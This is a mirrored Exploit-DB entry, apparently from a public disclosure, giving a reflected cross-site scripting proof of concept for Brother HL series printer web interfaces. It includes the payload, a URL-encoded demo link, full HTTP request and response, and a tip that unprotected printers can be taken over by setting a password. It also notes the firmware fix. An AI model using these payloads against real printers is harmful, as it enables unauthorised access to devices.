bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/44839.md
Offensive Security ad4b4f15f3 DB: 2018-06-06 
11 changes to exploits/shellcodes

Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption

Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)
Clone2GO Video converter 2.8.2 - Buffer Overflow
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
WebKitGTK+ < 2.21.3 - Crash (PoC)

WebKit - not_number defineProperties UAF (Metasploit)

EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting
MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting
Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
Brother HL Series Printers 1.15 - Cross-Site Scripting
Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)
2018-06-06 05:01:46 +00:00

5.2 KiB
Raw Blame History

Exploit Title: [ XSS at Brother HL series printers]

Date: [30.05.2018]

Exploit Author: [Huy Kha]

Vendor Homepage: [http://support.brother.com]

Software Link: [ Website ]

Version: Brother HL series printers.

Tested on: Mozilla FireFox

Reflected XSS Payload :

"--!><Svg/OnLoad=(confirm)(1)>"

Description : Starting searching for printers without having a password.

When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it.

PoC :

If you want to execute the XSS you need to be loged into the web interface first.

Example :

  1. Go to the following url: http://127.0.0.1/

  2. Login with ''admin'' as password

  3. Intercept now the request with Burpsuite

  4. The XSS exist in the loginerror.html?url= parameter

  5. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241

Request :

GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

Response :

HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 3389 Content-Type: text/html Content-Language: nl Connection: close Server: debut/1.20 Pragma: no-cache

<html lang="nl" xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl"><head> </head>

HL-L2340D series

Log in<Svg/OnLoad=(confirm)(1)>"&pageid=241"/>

    • Algemeen

 

Log in

Om deze pagina te openen moet u inloggen. Log in s.v.p.

Copyright(C) 2000-2014 Brother Industries, Ltd. All Rights Reserved.
TopTop
</html>

How to fix it? : Update the printer to Firmware 1.16 and set a new password.

Screenshot : https://imgur.com/a/3OVTSZ4

Note: The vendor has been contacted on 30-5-2018.